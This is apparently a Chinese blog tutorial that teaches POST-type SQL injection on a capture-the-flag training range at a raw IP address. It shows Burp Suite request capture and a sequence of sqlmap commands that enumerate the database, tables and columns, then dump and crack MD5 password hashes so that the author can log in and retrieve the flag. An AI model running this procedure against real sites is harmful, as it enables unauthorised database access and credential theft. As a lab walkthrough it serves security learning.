POST型SQL注入教学

这次教学要用到的工具有burpsuite,SQLMAP,浏览器

上次我给大家分享的AJE-Windows里面什么工具都有,可以直接装一个AJE-Windows工具不用一个一个的下,太麻烦

然后这次教学要用到的SQLMAP模块参数给大家说一下

–current-db //获取当前使用 的数据库

–tables 列出指定数据库中的表

–columns //获取当前数据库中当前表的所有列名

–dump //获取当前数据库中当前表的所有用户名和密码

首先我们打开我们的AJE-Windows,再打开SQLMAP和burpsuite
POST型SQL注入教学

靶场地址是http://219.153.49.228:45888
POST型SQL注入教学

我们随便输入账号密码,然后打开burpsuite开启拦截包之后点登录,右键把拦截的数据包发送到repeater
POST型SQL注入教学

右键文件复制到桌面
POST型SQL注入教学

输入文件名然后点击保存
POST型SQL注入教学

然后输入sqlmap.py -r 这里写刚刚保存的数据包(拖拽) --current-db回车
POST型SQL注入教学

好的跑出来了,这个站常用的数据库名是mozhe_Discuz_StormGroup
POST型SQL注入教学

然后接下来跑数据库表名sqlmap.py -r 抓包的文件 -D 该站点用的数据库名 --tables
POST型SQL注入教学

跑出来的表名是StormGroup_member
POST型SQL注入教学

接下来跑表内字段sqlmap.py -r 数据包文件 -D 数据库名 -T 表名 --columns
POST型SQL注入教学

跑出来了表内字段name和password,这两个分别是用户名的列名和密码的列名

接下来跑用户名和密码sqlmap.py -r 数据包文件 -D 库名 -T 表名 -C name,password --dump

第一个用户名是mozhe第二个也是,第一个密码是356f589a7df439f6f744ff19bb8092c0第二个密码是

cac346c4e78571439ba96bc5a47c01b6,它用的是MD5加密,第一个解出来是dsan13
POST型SQL注入教学

我们试试第一个能不能登上去
POST型SQL注入教学

第一个登陆失败了试试第二个,第二个解出来密码是885288

POST型SQL注入教学

我们登陆试试,登陆成功了,key是mozhe4953564e012470c2374e45919c2
POST型SQL注入教学

提交key

POST型SQL注入教学

好的,本次教学就到这里,喜欢我文章的欢迎点赞加关注,再订阅一下我的专栏,或者加入我专栏,有什么地方写的不好的欢迎加我QQ3516634930反馈